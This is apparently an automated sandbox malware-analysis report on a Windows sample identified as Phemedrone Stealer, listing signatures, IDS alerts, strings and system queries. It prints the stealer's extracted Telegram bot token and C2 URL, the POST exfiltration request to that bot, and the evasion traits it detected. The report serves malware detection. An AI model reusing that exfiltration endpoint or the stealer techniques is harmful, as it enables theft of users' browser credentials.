Edit tour

Windows Analysis Report
qqnal04.exe

Overview

General Information

Sample name:	qqnal04.exe
Analysis ID:	1591799
MD5:	b63e93f067d727c983c46012f35647d4
SHA1:	07591cf86732d0e0b1f822eef2147c24bda77df3
SHA256:	eebb47c48137f331e9e7e203763300c343a3643f88c60318667b5d525c40a058
Tags:	exeinfostealermalwaretrojanuser-Joker
Infos:

Detection

Phemedrone Stealer

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected Generic Stealer

Yara detected Phemedrone Stealer

Yara detected Telegram Recon

AI detected suspicious sample

Machine Learning detection for sample

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Tries to harvest and steal browser information (history, passwords, etc)

Uses the Telegram API (likely for C&C communication)

Yara detected Generic Downloader

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains long sleeps (>= 3 min)

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

PE / OLE file has an invalid certificate

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

qqnal04.exe (PID: 3008 cmdline: "C:\Users\user\Desktop\qqnal04.exe" MD5: B63E93F067D727C983C46012F35647D4)

cleanup

Malware Configuration

Threatname: Phemedrone Stealer

{"C2 url": "https://api.telegram.org/bot7105371916:AAHmKYUFBY4gzPciIZ6nC4H-7mczREtwqxk/sendMessage?chat_id=8013500311"}

Yara Signatures

Initial Sample

Source	Rule	Description	Author
qqnal04.exe	JoeSecurity_PhemedroneStealer	Yara detected Phemedrone Stealer	Joe Security
qqnal04.exe	JoeSecurity_TelegramRecon	Yara detected Telegram Recon	Joe Security
qqnal04.exe	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000000.00000002.2107964117.000002903C016000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_GenericStealer_9	Yara detected Generic Stealer	Joe Security
00000000.00000002.2106933727.000002902BB04000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_GenericStealer_9	Yara detected Generic Stealer	Joe Security
00000000.00000002.2107964117.000002903BCC4000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_GenericStealer_9	Yara detected Generic Stealer	Joe Security
00000000.00000002.2106933727.000002902BB20000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_GenericStealer_9	Yara detected Generic Stealer	Joe Security
00000000.00000000.2018774350.0000029029CC2000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_PhemedroneStealer	Yara detected Phemedrone Stealer	Joe Security
00000000.00000002.2107964117.000002903BED6000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_GenericStealer_9	Yara detected Generic Stealer	Joe Security
00000000.00000002.2107964117.000002903BAF6000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_GenericStealer_9	Yara detected Generic Stealer	Joe Security
00000000.00000002.2107964117.000002903BCF7000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_GenericStealer_9	Yara detected Generic Stealer	Joe Security
Process Memory Space: qqnal04.exe PID: 3008	JoeSecurity_PhemedroneStealer	Yara detected Phemedrone Stealer	Joe Security
Process Memory Space: qqnal04.exe PID: 3008	JoeSecurity_GenericStealer_9	Yara detected Generic Stealer	Joe Security
Click to see the 5 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.0.qqnal04.exe.29029cc0000.0.unpack	JoeSecurity_PhemedroneStealer	Yara detected Phemedrone Stealer	Joe Security
0.0.qqnal04.exe.29029cc0000.0.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security

Suricata Signatures

ET MALWARE Win32/SaintStealer CnC Response

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-15T13:34:04.024220+0100	2039009	1	A Network Trojan was detected	149.154.167.220	443	192.168.2.5	49708	TCP

ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screenshot.) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-15T13:34:03.068552+0100	2843856	1	A Network Trojan was detected	192.168.2.5	49708	149.154.167.220	443	TCP

Joe Security ANOMALY Telegram Send File

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-15T13:34:03.066622+0100	1810008	1	Potentially Bad Traffic	192.168.2.5	49708	149.154.167.220	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: qqnal04.exe

Malware Configuration Extractor: Phemedrone Stealer {"C2 url": "https://api.telegram.org/bot7105371916:AAHmKYUFBY4gzPciIZ6nC4H-7mczREtwqxk/sendMessage?chat_id=8013500311"}

Multi AV Scanner detection for submitted file

Source: qqnal04.exe

Virustotal: Detection: 44%

Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 97.9% probability

Machine Learning detection for sample

Source: qqnal04.exe

Joe Sandbox ML: detected

Source: C:\Users\user\Desktop\qqnal04.exe

Code function: 0_2_00007FF848F215F2 CryptUnprotectData,

0_2_00007FF848F215F2

Source: unknown	HTTPS traffic detected: 172.67.70.233:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49708 version: TLS 1.2

Source: qqnal04.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:

Binary string: \mw\csharp\Phemedrone Stealer V2.3.2\Phemedrone-Stealer\obj\Release\system.pdb source: qqnal04.exe

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:49708 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2843856 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screenshot.) M2 : 192.168.2.5:49708 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2039009 - Severity 1 - ET MALWARE Win32/SaintStealer CnC Response : 149.154.167.220:443 -> 192.168.2.5:49708

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Yara detected Generic Downloader

Source: Yara match	File source: qqnal04.exe, type: SAMPLE
Source: Yara match	File source: 0.0.qqnal04.exe.29029cc0000.0.unpack, type: UNPACKEDPE

Source: global traffic

HTTP traffic detected: GET /v1/ip/geo.json HTTP/1.1Host: get.geojs.ioConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 172.67.70.233 172.67.70.233

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown

DNS query: name: get.geojs.io

Source: global traffic

HTTP traffic detected: POST /bot7105371916:AAHmKYUFBY4gzPciIZ6nC4H-7mczREtwqxk/sendDocument HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/602.37 (KHTML, like Gecko) Chrome/49.0.1422.399 Safari/600Content-Type: multipart/form-data; boundary=----------------------------8dd3536fad403f1Host: api.telegram.orgContent-Length: 734520Expect: 100-continueConnection: Keep-Alive

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

HTTP traffic detected: GET /v1/ip/geo.json HTTP/1.1Host: get.geojs.ioConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: get.geojs.io
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org

Source: unknown

Source: qqnal04.exe, 00000000.00000002.2106933727.000002902BB52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.telegram.org
Source: qqnal04.exe	String found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
Source: qqnal04.exe	String found in binary or memory: http://crl.globalsign.com/gsextendcodesignsha2g3.crl0
Source: qqnal04.exe	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0b
Source: qqnal04.exe	String found in binary or memory: http://crl.globalsign.net/root-r3.crl0
Source: qqnal04.exe, 00000000.00000002.2106933727.000002902BC7D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://get.geojs.io
Source: qqnal04.exe	String found in binary or memory: http://ocsp2.globalsign.com/gsextendcodesignsha2g30U
Source: qqnal04.exe	String found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
Source: qqnal04.exe	String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: qqnal04.exe, 00000000.00000002.2106933727.000002902BA91000.00000004.00000800.00020000.00000000.sdmp, qqnal04.exe, 00000000.00000002.2106933727.000002902BBC5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: qqnal04.exe	String found in binary or memory: http://secure.globalsign.com/cacert/gsextendcodesignsha2g3ocsp.crt0
Source: qqnal04.exe	String found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
Source: qqnal04.exe, 00000000.00000002.2106933727.000002902BB20000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: qqnal04.exe	String found in binary or memory: https://api.telegram.org/bot
Source: qqnal04.exe, 00000000.00000002.2106933727.000002902BB20000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot7105371916:AAHmKYUFBY4gzPciIZ6nC4H-7mczREtwqxk/sendDocument
Source: qqnal04.exe, 00000000.00000002.2106933727.000002902BA91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot7105371916:AAHmKYUFBY4gzPciIZ6nC4H-7mczREtwqxk/sendDocument0
Source: qqnal04.exe, 00000000.00000002.2106933727.000002902BC76000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://get.geHj
Source: qqnal04.exe, 00000000.00000002.2106933727.000002902BA91000.00000004.00000800.00020000.00000000.sdmp, qqnal04.exe, 00000000.00000002.2106933727.000002902BBC5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://get.geojs.io
Source: qqnal04.exe, 00000000.00000002.2106933727.000002902BA91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://get.geojs.io/v1/ip/geo.json
Source: qqnal04.exe	String found in binary or memory: https://get.geojs.io/v1/ip/geo.json)root
Source: qqnal04.exe	String found in binary or memory: https://www.globalsign.com/repository/0
Source: qqnal04.exe	String found in binary or memory: https://www.globalsign.com/repository/06

Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707

Source: unknown	HTTPS traffic detected: 172.67.70.233:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49708 version: TLS 1.2

Source: C:\Users\user\Desktop\qqnal04.exe	Code function: 0_2_00007FF848F26A95	0_2_00007FF848F26A95
Source: C:\Users\user\Desktop\qqnal04.exe	Code function: 0_2_00007FF848F18B68	0_2_00007FF848F18B68
Source: C:\Users\user\Desktop\qqnal04.exe	Code function: 0_2_00007FF848F15B72	0_2_00007FF848F15B72
Source: C:\Users\user\Desktop\qqnal04.exe	Code function: 0_2_00007FF848F14DC6	0_2_00007FF848F14DC6
Source: C:\Users\user\Desktop\qqnal04.exe	Code function: 0_2_00007FF848F1BF7A	0_2_00007FF848F1BF7A
Source: C:\Users\user\Desktop\qqnal04.exe	Code function: 0_2_00007FF848F176D0	0_2_00007FF848F176D0

Source: qqnal04.exe

Static PE information: invalid certificate

Source: qqnal04.exe, 00000000.00000000.2018798042.0000029029CE0000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamesystem.exeH vs qqnal04.exe
Source: qqnal04.exe	Binary or memory string: OriginalFilenamesystem.exeH vs qqnal04.exe

Source: qqnal04.exe

Binary string: ParentProcessId3\Device\LanmanRedirector\

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@1/1@2/2

Source: C:\Users\user\Desktop\qqnal04.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\qqnal04.exe.log

Jump to behavior

Source: C:\Users\user\Desktop\qqnal04.exe	Mutant created: NULL
Source: C:\Users\user\Desktop\qqnal04.exe	Mutant created: \Sessions\1\BaseNamedObjects\BestStealer

Source: qqnal04.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: qqnal04.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.98%

Source: C:\Users\user\Desktop\qqnal04.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2152
Source: C:\Users\user\Desktop\qqnal04.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1720
Source: C:\Users\user\Desktop\qqnal04.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3596
Source: C:\Users\user\Desktop\qqnal04.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4732
Source: C:\Users\user\Desktop\qqnal04.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 420
Source: C:\Users\user\Desktop\qqnal04.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2140
Source: C:\Users\user\Desktop\qqnal04.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5708
Source: C:\Users\user\Desktop\qqnal04.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5152
Source: C:\Users\user\Desktop\qqnal04.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2132
Source: C:\Users\user\Desktop\qqnal04.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1700
Source: C:\Users\user\Desktop\qqnal04.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2992
Source: C:\Users\user\Desktop\qqnal04.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3852
Source: C:\Users\user\Desktop\qqnal04.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5144
Source: C:\Users\user\Desktop\qqnal04.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6000
Source: C:\Users\user\Desktop\qqnal04.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1688
Source: C:\Users\user\Desktop\qqnal04.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3840
Source: C:\Users\user\Desktop\qqnal04.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3408
Source: C:\Users\user\Desktop\qqnal04.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1252
Source: C:\Users\user\Desktop\qqnal04.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2104
Source: C:\Users\user\Desktop\qqnal04.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6056
Source: C:\Users\user\Desktop\qqnal04.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6496
Source: C:\Users\user\Desktop\qqnal04.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2528
Source: C:\Users\user\Desktop\qqnal04.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2096
Source: C:\Users\user\Desktop\qqnal04.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3388
Source: C:\Users\user\Desktop\qqnal04.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1232
Source: C:\Users\user\Desktop\qqnal04.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 368
Source: C:\Users\user\Desktop\qqnal04.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5236
Source: C:\Users\user\Desktop\qqnal04.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 872
Source: C:\Users\user\Desktop\qqnal04.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4672
Source: C:\Users\user\Desktop\qqnal04.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3376
Source: C:\Users\user\Desktop\qqnal04.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1220
Source: C:\Users\user\Desktop\qqnal04.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 788
Source: C:\Users\user\Desktop\qqnal04.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3372
Source: C:\Users\user\Desktop\qqnal04.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 780
Source: C:\Users\user\Desktop\qqnal04.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2932
Source: C:\Users\user\Desktop\qqnal04.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4652
Source: C:\Users\user\Desktop\qqnal04.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\qqnal04.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1632
Source: C:\Users\user\Desktop\qqnal04.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 564
Source: C:\Users\user\Desktop\qqnal04.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2492
Source: C:\Users\user\Desktop\qqnal04.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 332
Source: C:\Users\user\Desktop\qqnal04.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\qqnal04.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2484
Source: C:\Users\user\Desktop\qqnal04.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6792
Source: C:\Users\user\Desktop\qqnal04.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1188
Source: C:\Users\user\Desktop\qqnal04.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5496
Source: C:\Users\user\Desktop\qqnal04.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5064
Source: C:\Users\user\Desktop\qqnal04.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 752
Source: C:\Users\user\Desktop\qqnal04.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1612
Source: C:\Users\user\Desktop\qqnal04.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2472
Source: C:\Users\user\Desktop\qqnal04.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3764
Source: C:\Users\user\Desktop\qqnal04.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3304
Source: C:\Users\user\Desktop\qqnal04.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1172
Source: C:\Users\user\Desktop\qqnal04.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2464
Source: C:\Users\user\Desktop\qqnal04.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3756
Source: C:\Users\user\Desktop\qqnal04.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2836
Source: C:\Users\user\Desktop\qqnal04.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2456
Source: C:\Users\user\Desktop\qqnal04.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2024
Source: C:\Users\user\Desktop\qqnal04.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5040
Source: C:\Users\user\Desktop\qqnal04.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5636
Source: C:\Users\user\Desktop\qqnal04.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5896
Source: C:\Users\user\Desktop\qqnal04.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1584
Source: C:\Users\user\Desktop\qqnal04.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6604
Source: C:\Users\user\Desktop\qqnal04.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1660
Source: C:\Users\user\Desktop\qqnal04.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1148
Source: C:\Users\user\Desktop\qqnal04.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2440
Source: C:\Users\user\Desktop\qqnal04.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2868
Source: C:\Users\user\Desktop\qqnal04.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 280
Source: C:\Users\user\Desktop\qqnal04.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5020
Source: C:\Users\user\Desktop\qqnal04.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3724
Source: C:\Users\user\Desktop\qqnal04.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5016
Source: C:\Users\user\Desktop\qqnal04.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 732
Source: C:\Users\user\Desktop\qqnal04.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4172

Source: C:\Users\user\Desktop\qqnal04.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: qqnal04.exe

Virustotal: Detection: 44%

Source: C:\Users\user\Desktop\qqnal04.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\qqnal04.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\qqnal04.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\qqnal04.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\qqnal04.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\qqnal04.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\qqnal04.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\qqnal04.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\qqnal04.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qqnal04.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\qqnal04.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qqnal04.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\qqnal04.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\qqnal04.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\qqnal04.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\qqnal04.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\qqnal04.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qqnal04.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\qqnal04.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\qqnal04.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\qqnal04.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\qqnal04.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\qqnal04.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\qqnal04.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\qqnal04.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\qqnal04.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qqnal04.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\qqnal04.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\qqnal04.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qqnal04.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qqnal04.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\qqnal04.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\qqnal04.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\qqnal04.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\qqnal04.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\qqnal04.exe	Section loaded: mskeyprotect.dll	Jump to behavior
